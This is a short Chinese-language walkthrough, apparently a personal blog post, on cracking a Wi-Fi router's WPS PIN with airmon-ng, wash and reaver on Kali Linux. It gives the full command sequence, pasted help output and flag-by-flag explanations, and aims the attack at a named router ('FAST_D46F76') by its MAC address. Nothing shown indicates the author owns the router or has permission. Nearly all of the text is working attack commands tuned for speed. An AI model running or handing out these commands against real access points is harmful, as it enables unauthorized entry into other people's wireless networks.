開啓網卡監聽模式
airmon-ng start wlan2
查看開啓QSS快速連接功能的路由器
root@kali:~# wash --help Wash v1.4 WiFi Protected Setup Scan Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> Required Arguments: -i, --interface=<iface> Interface to capture packets on -f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files Optional Arguments: -c, --channel=<num> Channel to listen on [auto] -o, --out-file=<file> Write data to file -n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15] -D, --daemonize Daemonize wash -C, --ignore-fcs Ignore frame checksum errors -5, --5ghz Use 5GHz 802.11 channels -s, --scan Use scan mode -u, --survey Use survey mode [default] -h, --help Show help Example: wash -i mon0
使用-C參數,BSSID爲AP的MAC,channel是信道,RSSI是信號值,數字部分越小代表信號越強,WPS Locked就是WPS鎖死機制,ESSID是信號名稱
wash -i mon0 -C
選定FAST_D46F76路由器開始***
root@kali:~# reaver --help Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> Required Arguments: -i, --interface=<wlan> Name of the monitor-mode interface to use -b, --bssid=<mac> BSSID of the target AP Optional Arguments: -m, --mac=<mac> MAC of the host system -e, --essid=<ssid> ESSID of the target AP -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f) -o, --out-file=<file> Send output to a log file [stdout] -s, --session=<file> Restore a previous session file -C, --exec=<command> Execute the supplied command upon successful pin recovery -D, --daemonize Daemonize reaver -a, --auto Auto detect the best advanced options for the target AP -f, --fixed Disable channel hopping -5, --5ghz Use 5GHz 802.11 channels -v, --verbose Display non-critical warnings (-vv for more) -q, --quiet Only display critical messages -h, --help Show help Advanced Options: -p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin -d, --delay=<seconds> Set the delay between pin attempts [1] -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60] -g, --max-attempts=<num> Quit after num pin attempts -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0] -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts -t, --timeout=<seconds> Set the receive timeout period [5] -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20] -A, --no-associate Do not associate with the AP (association must be done by another application) -N, --no-nacks Do not send NACK messages when out of order packets are received -S, --dh-small Use small DH keys to improve crack speed -L, --ignore-locks Ignore locked state reported by the target AP -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet -n, --nack Target AP always sends a NACK [Auto] -w, --win7 Mimic a Windows 7 registrar [False] Example: reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv
使用如下參數
reaver –i mon0 -b 28:2C:B2:D4:6F:76 -a -S -d 3 -t 3 -vv -c 1
-i 網卡的監視接口
-b 目標AP的MAC地址
-a 自動檢測目標AP最佳配置
-S 使用最小的DH key,可以提高破解速度
-d 即delay,延時 預設爲1秒
-t 即timeout,超時 每次窮舉等待反饋的最長時間
-vv 顯示更多的非嚴重警告
-c 指定信道,可以方便找到信號
晚飯吃完回來,希望能夠破解出來:)